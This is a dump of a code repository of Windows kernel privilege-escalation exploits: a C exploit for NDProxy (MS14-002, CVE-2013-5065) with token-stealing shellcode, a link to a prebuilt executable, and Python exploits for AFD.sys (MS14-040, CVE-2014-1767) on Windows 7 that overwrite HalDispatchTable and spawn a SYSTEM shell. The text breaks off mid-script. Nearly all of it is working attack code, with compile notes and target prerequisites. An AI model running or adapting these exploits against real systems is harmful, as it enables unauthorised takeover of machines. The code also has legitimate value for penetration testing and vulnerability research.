"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" 65 | sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) 66 | alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) 67 | if alloc == 0: 68 | print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc 69 | getLastError() 70 | 71 | dwRetBytes = DWORD(0) 72 | DEVICE_NAME = "\\\\.\\NDProxy" 73 | hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) 74 | if hdev == -1: 75 | print "[-] Couldn't open the device... :(" 76 | sys.exit() 77 | kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) 78 | kernel32.CloseHandle(hdev) 79 | print "[+] Spawning SYSTEM Shell..." 80 | os.system("start /d \"C:\\windows\\system32\" cmd.exe") -------------------------------------------------------------------------------- /MS14-002/37732.c: -------------------------------------------------------------------------------- 1 | /* 2 | ################################################################ 3 | # Exploit Title: Windows NDProxy Privilege Escalation (MS14-002) 4 | # Date: 2015-08-03 5 | # Exploit Author: Tomislav Paskalev 6 | # Vulnerable Software: 7 | # Windows XP SP3 x86 8 | # Windows XP SP2 x86-64 9 | # Windows 2003 SP2 x86 10 | # Windows 2003 SP2 x86-64 11 | # Windows 2003 SP2 IA-64 12 | # Supported vulnerable software: 13 | # Windows XP SP3 x86 14 | # Windows 2003 SP2 x86 15 | # Tested on: 16 | # Windows XP SP3 x86 EN 17 | # Windows 2003 SP2 x86 EN 18 | # CVE ID: 2013-5065 19 | ################################################################ 20 | # Vulnerability description: 21 | # NDPROXY is a system-provided driver that interfaces WAN 22 | # miniport drivers, call managers, and miniport call managers 23 | # to the Telephony Application Programming Interfaces (TAPI) 24 | # services. 25 | # The vulnerability is caused when the NDProxy.sys kernel 26 | # component fails to properly validate input. 27 | # An attacker who successfully exploited this vulnerability 28 | # could run arbitrary code in kernel mode (i.e. with SYSTEM 29 | # privileges). 30 | ################################################################ 31 | # Exploit notes: 32 | # Privileged shell execution: 33 | # - the SYSTEM shell will spawn within the existing shell 34 | # (i.e. exploit usable via a remote shell) 35 | # Exploit compiling: 36 | # - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe 37 | # Exploit prerequisites: 38 | # - low privilege access to the target (remote shell or RDP) 39 | # - target not patched (KB2914368 not installed) 40 | # - service "Routing and Remote Access" running on the target 41 | # - "Power User" user group can start and stop services 42 | # - > sc query remoteaccess 43 | # - > sc start remoteaccess 44 | ################################################################ 45 | # Thanks to: 46 | # Andy (C PoC - Win XP SP3) 47 | # ryujin (Python PoC - Win XP SP3) 48 | ################################################################ 49 | # References: 50 | # http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065 51 | # https://technet.microsoft.com/en-us/library/security/ms14-002.aspx 52 | # https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/ 53 | # https://www.exploit-db.com/exploits/30014/ 54 | # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx 55 | # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx 56 | # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx 57 | # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx 58 | ################################################################ 59 | */ 60 | 61 | #include 62 | #include 63 | #include 64 | 65 | 66 | 67 | typedef struct { 68 | PVOID Unknown1; 69 | PVOID Unknown2; 70 | PVOID Base; 71 | ULONG Size; 72 | ULONG Flags; 73 | USHORT Index; 74 | USHORT NameLength; 75 | USHORT LoadCount; 76 | USHORT PathLength; 77 | CHAR ImageName[256]; 78 | } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; 79 | 80 | 81 | typedef struct { 82 | ULONG Count; 83 | SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; 84 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 85 | 86 | 87 | typedef enum _SYSTEM_INFORMATION_CLASS { 88 | SystemModuleInformation = 11, 89 | SystemHandleInformation = 16 90 | } SYSTEM_INFORMATION_CLASS; 91 | 92 | 93 | typedef DWORD NTSTATUS; 94 | NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass, 95 | PVOID SystemInformation, 96 | ULONG SystemInformationLength, 97 | PULONG ReturnLength); 98 | 99 | 100 | 101 | static VOID InitFirstPage (void) 102 | { 103 | PVOID BaseAddress; 104 | ULONG RegionSize; 105 | NTSTATUS ReturnCode; 106 | FARPROC NtAllocateVirtualMemory; 107 | 108 | NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory"); 109 | 110 | fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory); 111 | RegionSize = 0xf000; 112 | BaseAddress = (PVOID) 0x00000001; 113 | ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (), 114 | &BaseAddress, 115 | 0, 116 | &RegionSize, 117 | MEM_COMMIT | MEM_RESERVE, 118 | PAGE_EXECUTE_READWRITE); 119 | if (ReturnCode != 0) 120 | { 121 | fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n"); 122 | fprintf (stderr, " Error code: %#X\n", ReturnCode); 123 | fflush (stderr); 124 | ExitProcess (1); 125 | } 126 | fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr); 127 | FillMemory (BaseAddress, RegionSize, 0x41); 128 | return; 129 | } 130 | 131 | 132 | 133 | int exploit (unsigned char *shellcode) 134 | { 135 | DWORD writtenBytes; 136 | int returnValue; 137 | 138 | InitFirstPage (); 139 | 140 | unsigned char *shellcodeBuffer; 141 | shellcodeBuffer = (char *) malloc (400); 142 | memset (shellcodeBuffer, (int) "xCC", 400); 143 | memcpy (shellcodeBuffer, shellcode, 112); 144 | 145 | returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes); 146 | if (returnValue == 0) 147 | { 148 | printf ("[-] Attempt to map memory_write failed\n"); 149 | printf (" Error code: %d\n", GetLastError ()); 150 | exit(1); 151 | } 152 | HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL); 153 | if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE) 154 | { 155 | printf ("[-] Creating a device handle on NDProxy failed\n"); 156 | printf (" Error code: %d\n", GetLastError()); 157 | exit (0); 158 | } 159 | DWORD inputBuffer [0x15] = {0}; 160 | DWORD returnedBytes = 0; 161 | *(inputBuffer + 5) = 0x7030125; 162 | *(inputBuffer + 7) = 0x34; 163 | DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0); 164 | CloseHandle (ndProxyDeviceHandle); 165 | system ("cmd.exe /T:C0 /K cd c:\\windows\\system32"); 166 | return 0; 167 | } 168 | 169 | 170 | 171 | int main (int argc, char **argv) 172 | { 173 | if (argc != 2) 174 | { 175 | printf ("[*] Usage: %s OS_TYPE\n", argv[0]); 176 | printf (" supported OS_TYPE:\n"); 177 | printf (" XP - Windows XP SP3 x86\n"); 178 | printf (" 2k3 - Windows 2003 SP2 x86\n"); 179 | printf ("[*] Note: the service \"Routing and Remote Access\"\n"); 180 | printf (" must be running on the target machine\n"); 181 | exit (0); 182 | } 183 | else 184 | { 185 | if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0)) 186 | { 187 | unsigned char shellcodeXP[] = 188 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 189 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 190 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 191 | "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90" 192 | "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B" 193 | "\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00" 194 | "\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"; 195 | exploit (shellcodeXP); 196 | } 197 | else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0)) 198 | { 199 | unsigned char shellcode2k3[] = 200 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 201 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 202 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 203 | "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90" 204 | "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B" 205 | "\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00" 206 | "\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3"; 207 | exploit (shellcode2k3); 208 | } 209 | else 210 | { 211 | printf ("[-] Invalid argument\n"); 212 | printf (" Argument used: %s\n", argv[1]); 213 | exit(0); 214 | } 215 | } 216 | } 217 | -------------------------------------------------------------------------------- /MS14-002/MS14-002.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/abatchy17/WindowsExploits/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS14-002/MS14-002.exe -------------------------------------------------------------------------------- /MS14-040/39446.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: MS14-040 - AFD.SYS Dangling Pointer 2 | # Date: 2016-02-05 3 | # Exploit Author: Rick Larabee 4 | # Vendor Homepage: www.microsoft.com 5 | # Version: Windows 7, 32 bit 6 | # Tested on: Win7 x32 7 | # afd.sys - 6.1.7600.16385 8 | # ntdll.dll - 6.1.7600.16385 9 | # 10 | # CVE : CVE-2014-1767 11 | # Category: Local Privilege Escalation 12 | # References: 13 | # http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf 14 | # http://ricklarabee.blogspot.com/ 15 | # https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/ 16 | # https://technet.microsoft.com/en-us/library/security/ms14-040.aspx 17 | # http://www.cvedetails.com/cve/CVE-2014-1767/ 18 | # 19 | # Greetz: PWN4GEPWN1E, SecurityMook 20 | 21 | 22 | 23 | from ctypes import * 24 | import socket, time, os, struct, sys 25 | from ctypes.wintypes import HANDLE, DWORD 26 | 27 | kernel32 = windll.kernel32 28 | ntdll = windll.ntdll 29 | Psapi = windll.Psapi 30 | 31 | MEMRES = (0x1000 | 0x2000) 32 | PAGEEXE = 0x00000040 33 | Zerobits = c_int(0) 34 | RegionSize = c_int(0x1000) 35 | written = c_int(0) 36 | 37 | FakeObjSize = 0xA0 38 | 39 | GENERIC_READ = 0x80000000 40 | GENERIC_WRITE = 0x40000000 41 | GENERIC_EXECUTE = 0x20000000 42 | GENERIC_ALL = 0x10000000 43 | INVALID_HANDLE_VALUE = -1 44 | 45 | WSAGetLastError = windll.Ws2_32.WSAGetLastError 46 | WSAGetLastError.argtypes = () 47 | WSAGetLastError.restype = c_int 48 | SOCKET = c_int 49 | WSASocket = windll.Ws2_32.WSASocketA 50 | WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) 51 | WSASocket.restype = SOCKET 52 | closesocket = windll.Ws2_32.closesocket 53 | closesocket.argtypes = (SOCKET,) 54 | closesocket.restype = c_int 55 | connect = windll.Ws2_32.connect 56 | connect.argtypes = (SOCKET, c_void_p, c_int) 57 | connect.restype = c_int 58 | 59 | class sockaddr_in(Structure): 60 | _fields_ = [ 61 | ("sin_family", c_short), 62 | ("sin_port", c_ushort), 63 | ("sin_addr", c_ulong), 64 | ("sin_zero", c_char * 8), 65 | ] 66 | 67 | def findSysBase(drvname=None): 68 | ARRAY_SIZE = 1024 69 | myarray = c_ulong * ARRAY_SIZE 70 | lpImageBase = myarray() 71 | cb = c_int(1024) 72 | lpcbNeeded = c_long() 73 | drivername_size = c_long() 74 | drivername_size.value = 48 75 | 76 | Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 77 | for baseaddy in lpImageBase: 78 | drivername = c_char_p("\x00"*drivername_size.value) 79 | if baseaddy: 80 | Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, 81 | drivername_size.value) 82 | if drvname: 83 | if drivername.value.lower() == drvname: 84 | print "[+] Retrieving %s info..." % drvname 85 | print "[+] %s base address: %s" % (drvname, hex(baseaddy)) 86 | return baseaddy 87 | else: 88 | if drivername.value.lower().find("krnl") !=-1: 89 | print "[+] Retrieving Kernel info..." 90 | print "[+] Kernel version:", drivername.value 91 | print "[+] Kernel base address: %s" % hex(baseaddy) 92 | return (baseaddy, drivername.value) 93 | return None 94 | 95 | 96 | def CreateBuffer1(): 97 | inbuf1size = 0x30 98 | virtualAddress = 0x18888888 99 | length = 0x20000 100 | 101 | inbuf1 = "\x00" * 0x18 + struct.pack("L", virtualAddress) #0x1a 102 | inbuf1 += struct.pack("L", length) #0x20 103 | inbuf1 += "\x00" * 0x8 + "\x01" 104 | inbuf1 += "\x00" * (inbuf1size - len(inbuf1)) 105 | 106 | baseadd = c_int(0x1001) 107 | dwStatus = ntdll.NtAllocateVirtualMemory(-1, 108 | byref(baseadd), 109 | 0x0, 110 | byref(RegionSize), 111 | MEMRES, 112 | PAGEEXE) 113 | kernel32.WriteProcessMemory(-1, 0x1000, inbuf1, inbuf1size, byref(written)) 114 | 115 | 116 | def CreateBuffer2(): 117 | inbuf2size = 0x10 118 | addrforbuf2 = 0x0AAAAAAA 119 | 120 | inbuf2 = "\x01\x00\x00\x00" 121 | inbuf2 += struct.pack("L", addrforbuf2) 122 | inbuf2 += "\x00" * (inbuf2size -len(inbuf2)) 123 | 124 | baseadd = c_int(0x2001) 125 | dwStatus = ntdll.NtAllocateVirtualMemory(-1, 126 | byref(baseadd), 127 | 0x0, 128 | byref(RegionSize), 129 | MEMRES, 130 | PAGEEXE) 131 | kernel32.WriteProcessMemory(-1, 0x2000, inbuf2, inbuf2size, byref(written)) 132 | 133 | def CreateFakeObject(): 134 | print "[+] Print creating fakeobject" 135 | fakeobject2addr = 0x2200 136 | fakeobject2 = "\x00"*16 + struct.pack("L", HalDispatchTable+sizeof(c_void_p)-0x1C) 137 | fakeobj2size = len(fakeobject2) 138 | kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written)) 139 | 140 | objhead = ("\x00\x00\x00\x00\xa8\x00\x00\x00" 141 | "\x00\x00\x00\x00\x00\x00\x00\x00" 142 | "\x01\x00\x00\x00\x01\x00\x00\x00" 143 | "\x00\x00\x00\x00\x16\x00\x08\x00" 144 | "\x00\x00\x00\x00\x00\x00\x00\x00") 145 | 146 | 147 | fakeobject = objhead 148 | fakeobject += struct.pack("L", fakeobject2addr) + "\x41"*96 + struct.pack("L", HalDispatchTable + sizeof(c_void_p) - 0xB4) 149 | fakeobject += "\x41" * (FakeObjSize - len(fakeobject)) 150 | kernel32.WriteProcessMemory(-1, 0x2100, fakeobject, FakeObjSize, byref(written)) 151 | 152 | print "[+] creating socket..." 153 | sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0) 154 | 155 | if sock == -1: 156 | print "[-] no luck creating socket!" 157 | sys.exit(1) 158 | 159 | print "[+] got sock 0x%x" % sock 160 | 161 | addr = sockaddr_in() 162 | addr.sin_family = socket.AF_INET 163 | addr.sin_port = socket.htons(135) 164 | addr.sin_addr = socket.htonl(0x7f000001) 165 | 166 | connect(sock, byref(addr), sizeof(addr)) 167 | 168 | print "[+] sock connected." 169 | print "\n[+] GO!" 170 | 171 | (krnlbase, kernelver) = findSysBase() 172 | hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) 173 | HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") 174 | HalDispatchTable -= hKernel 175 | HalDispatchTable += krnlbase 176 | print "[+] HalDispatchTable address:", hex(HalDispatchTable) 177 | halbase = findSysBase("halmacpi.dll") 178 | OS = "7" 179 | if OS == "7": 180 | HaliQuerySystemInformation = halbase+0x278A2 # Offset for win7 181 | _KPROCESS = "\x50" 182 | _TOKEN = "\xf8" 183 | _UPID = "\xb4" 184 | _APLINKS = "\xb8" 185 | 186 | print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation) 187 | 188 | IoStatus = c_ulong() 189 | IoStatusBlock = c_ulong() 190 | 191 | CreateBuffer1() 192 | CreateBuffer2() 193 | CreateFakeObject() 194 | 195 | inbuf1 = 0x1000 196 | inbuf2 = 0x2000 197 | hWF = HANDLE(0) 198 | FakeWorkerFactoryADDR = 0x2100 199 | 200 | 201 | # Trigger 1 202 | # afd!afdTransmitFile 203 | ntdll.ZwDeviceIoControlFile(sock,None,None,None,byref(IoStatusBlock),0x1207f, inbuf1, 0x30, None, 0x0) 204 | 205 | CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, None, 0, 0)) 206 | 207 | ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,None,CompletionPort,INVALID_HANDLE_VALUE,None,None,0,0,0) 208 | hWFaddr = hWF 209 | print "[+] WorkerFactoryHandle:", hWF.value 210 | hWFaddr = int(addressof(hWF)) 211 | 212 | shellcode_address = 0x00020700 213 | padding = "\x90"*2 214 | HalDispatchTable0x4 = HalDispatchTable + 0x4 215 | 216 | _WFValue = struct.pack("L", hWFaddr) 217 | 218 | sc_pointer = struct.pack("L", shellcode_address+0x4) 219 | restore_ptrs = "\x31\xc0" + \ 220 | "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ 221 | "\xa3" + struct.pack("L", HalDispatchTable0x4) 222 | 223 | tokenstealing = "\x52" +\ 224 | "\x53" +\ 225 | "\x33\xc0" +\ 226 | "\x64\x8b\x80\x24\x01\x00\x00" +\ 227 | "\x8b\x40" + _KPROCESS +\ 228 | "\x8b\xc8" +\ 229 | "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ 230 | "\x89\x1d\x00\x09\x02\x00" +\ 231 | "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ 232 | "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ 233 | "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ 234 | "\x75\xe8" +\ 235 | "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ 236 | "\x8b\xc1" +\ 237 | "\x89\x90" + _TOKEN + "\x00\x00\x00" 238 | 239 | fixobjheaders = "\x33\xC0" +\ 240 | "\x64\x8B\x80\x24\x01\x00\x00" +\ 241 | "\x8B\x40\x50" +\ 242 | "\x8B\x80\xF4\x00\x00\x00" +\ 243 | "\x8B\xD8" +\ 244 | "\x8B\x00" +\ 245 | "\x8B\x0D" + _WFValue +\ 246 | "\x83\xE1\xFC" +\ 247 | "\x03\xC9" +\ 248 | "\x03\xC1" +\ 249 | "\xC7\x00\x00\x00\x00\x00" +\ 250 | "\x83\xC3\x30" +\ 251 | "\x8B\xC3" +\ 252 | "\x8B\x1B" +\ 253 | "\x83\xEB\x01" +\ 254 | "\x89\x18" +\ 255 | "\x5B" +\ 256 | "\x5A" +\ 257 | "\xC2\x10\x00" 258 | 259 | 260 | shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders 261 | shellcode_size = len(shellcode) 262 | orig_size = shellcode_size 263 | startPage = c_int(0x00020000) 264 | kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written)) 265 | kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written)) 266 | 267 | 268 | ### Trigger 2 269 | ## afd!AfdTransmitPackets 270 | ntdll.ZwDeviceIoControlFile(sock,None,None,None,byref(IoStatusBlock),0x120c3, inbuf2, 0x10, None, 0x0) 271 | 272 | ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False) 273 | 274 | ntdll.ZwSetInformationWorkerFactory(hWF, 8, shellcode_address, sizeof(c_void_p)) ; 275 | 276 | inp = c_ulong() 277 | out = c_ulong() 278 | inp = 0x1337 279 | qip = ntdll.NtQueryIntervalProfile(inp, byref(out)) 280 | print "[*] Spawning a SYSTEM shell..." 281 | os.system("cmd.exe /K cd c:\\windows\\system32") 282 | -------------------------------------------------------------------------------- /MS14-040/39525.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: MS14-040 - AFD.SYS Dangling Pointer 2 | # Date: 2016-03-03 3 | # Exploit Author: Rick Larabee 4 | # Vendor Homepage: www.microsoft.com 5 | # Version: Windows 7, 64 bit 6 | # Tested on: Win7 x64 7 | # afd.sys - 6.1.7601.17514 8 | # ntdll.dll - 6.1.7601.17514 9 | # 10 | # CVE : CVE-2014-1767 11 | # Category: Local Privilege Escalation 12 | # References: 13 | # http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf 14 | # http://ricklarabee.blogspot.com/ 15 | # https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/ 16 | # https://technet.microsoft.com/en-us/library/security/ms14-040.aspx 17 | # http://www.cvedetails.com/cve/CVE-2014-1767/ 18 | # https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/ 19 | # 20 | # Greetz: PWN4GEPWN1E, SecurityMook 21 | 22 | 23 | from ctypes import * 24 | import socket, time, os, struct, sys 25 | from ctypes.wintypes import HANDLE, DWORD 26 | import platform 27 | 28 | kernel32 = windll.kernel32 29 | ntdll = windll.ntdll 30 | Psapi = windll.Psapi 31 | 32 | MEMRES = (0x1000 | 0x2000) 33 | PAGEEXE = 0x40 34 | Zerobits = c_int(0) 35 | RegionSize = c_ulonglong(0x1000) 36 | written = c_ulonglong(0) 37 | 38 | FakeObjSize = 0x100 39 | 40 | GENERIC_READ = 0x80000000 41 | GENERIC_WRITE = 0x40000000 42 | GENERIC_EXECUTE = 0x20000000 43 | GENERIC_ALL = 0x10000000 44 | INVALID_HANDLE_VALUE = -1 45 | 46 | WSAGetLastError = windll.Ws2_32.WSAGetLastError 47 | WSAGetLastError.argtypes = () 48 | WSAGetLastError.restype = c_int 49 | SOCKET = c_int 50 | WSASocket = windll.Ws2_32.WSASocketA 51 | WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD) 52 | WSASocket.restype = SOCKET 53 | closesocket = windll.Ws2_32.closesocket 54 | closesocket.argtypes = (SOCKET,) 55 | closesocket.restype = c_int 56 | connect = windll.Ws2_32.connect 57 | connect.argtypes = (SOCKET, c_void_p, c_int) 58 | connect.restype = c_int 59 | HalDispatchTable = c_uint64 60 | 61 | class sockaddr_in(Structure): 62 | _fields_ = [ 63 | ("sin_family", c_short), 64 | ("sin_port", c_ushort), 65 | ("sin_addr", c_ulong), 66 | ("sin_zero", c_char * 8), 67 | ] 68 | 69 | kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)] 70 | ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong] 71 | 72 | def find_driver_base(driver=None): 73 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 74 | 75 | if platform.architecture()[0] == '64bit': 76 | lpImageBase = (c_ulonglong * 1024)() 77 | lpcbNeeded = c_longlong() 78 | Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32] 79 | else: 80 | #if process_is_wow64(): 81 | # raise RuntimeError('python running in WOW64 is not supported') 82 | lpImageBase = (c_ulong * 1024)() 83 | lpcbNeeded = c_long() 84 | driver_name_size = c_long() 85 | driver_name_size.value = 48 86 | Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded)) 87 | for base_addr in lpImageBase: 88 | driver_name = c_char_p('\x00' * driver_name_size.value) 89 | if base_addr: 90 | Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value) 91 | if driver == None and driver_name.value.lower().find("krnl") != -1: 92 | return (base_addr, driver_name.value) 93 | elif driver_name.value.lower() == driver: 94 | return (base_addr, driver_name.value) 95 | return None 96 | 97 | def get_haldispatchtable(): 98 | #https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py 99 | 100 | if platform.architecture()[0] == '64bit': 101 | kernel32.LoadLibraryExA.restype = c_uint64 102 | kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)] 103 | kernel32.GetProcAddress.restype = c_uint64 104 | (krnlbase, kernelver) = find_driver_base() 105 | hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) 106 | halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable') 107 | halDispatchTable -= hKernel 108 | halDispatchTable += krnlbase 109 | return halDispatchTable 110 | 111 | 112 | def CreateBuffer1(inbuf1addr): 113 | print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr) 114 | inbuf1size = 0x40 115 | targetsize = 0x100 116 | virtualAddress = 0x13371337 117 | mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff) 118 | 119 | 120 | inbuf1 = "\x41" * 0x20 121 | inbuf1 += struct.pack("Q", virtualAddress) #0x1a 122 | inbuf1 += struct.pack("Q", mdlsize) 123 | inbuf1 += "\x42" * 4 124 | inbuf1 += "\x43" * 4 125 | inbuf1 += "\x01\x00\x00\x00" 126 | inbuf1 += "\x00\x00\x00\x00" 127 | inbuf1 += "\x00" * (inbuf1size - len(inbuf1)) 128 | 129 | baseadd = c_ulonglong(0x1001) 130 | 131 | dwStatus = ntdll.NtAllocateVirtualMemory(-1, 132 | byref(baseadd), 133 | 0x0, 134 | byref(RegionSize), 135 | MEMRES, 136 | PAGEEXE) 137 | 138 | wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written)) 139 | 140 | def CreateBuffer2(inbuf2addr): 141 | print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr) 142 | inbuf2size = 0x18 143 | addrforbuf2 = 0x0AAAAAAA 144 | 145 | inbuf2 = struct.pack("Q", 0x1) 146 | inbuf2 += struct.pack("Q", addrforbuf2) 147 | inbuf2 += "\x00" * (inbuf2size -len(inbuf2)) 148 | 149 | baseadd = c_ulonglong(inbuf2addr+1) 150 | dwStatus = ntdll.NtAllocateVirtualMemory(-1, 151 | byref(baseadd), 152 | 0x0, 153 | byref(RegionSize), 154 | MEMRES, 155 | PAGEEXE) 156 | kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written)) 157 | 158 | def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory): 159 | print "[+] Print creating fakeobject at ", hex(fakeobjectaddr) 160 | 161 | fakeobject2addr = setinfoworkerfactory - 0x18 162 | 163 | fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite) 164 | fakeobj2size = len(fakeobject2) 165 | kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written)) 166 | 167 | objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 168 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 169 | "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" 170 | "\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00" 171 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") 172 | 173 | fakeobject = objhead 174 | fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96 175 | fakeobject += "\x42" * (FakeObjSize - len(fakeobject)) 176 | kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written)) 177 | 178 | def main(): 179 | print "[+] creating socket..." 180 | sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0) 181 | 182 | if sock == -1: 183 | print "[-] no luck creating socket!" 184 | sys.exit(1) 185 | 186 | print "[+] got sock 0x%x" % sock 187 | 188 | addr = sockaddr_in() 189 | addr.sin_family = socket.AF_INET 190 | addr.sin_port = socket.htons(135) 191 | addr.sin_addr = socket.htonl(0x7f000001) 192 | 193 | connect(sock, byref(addr), 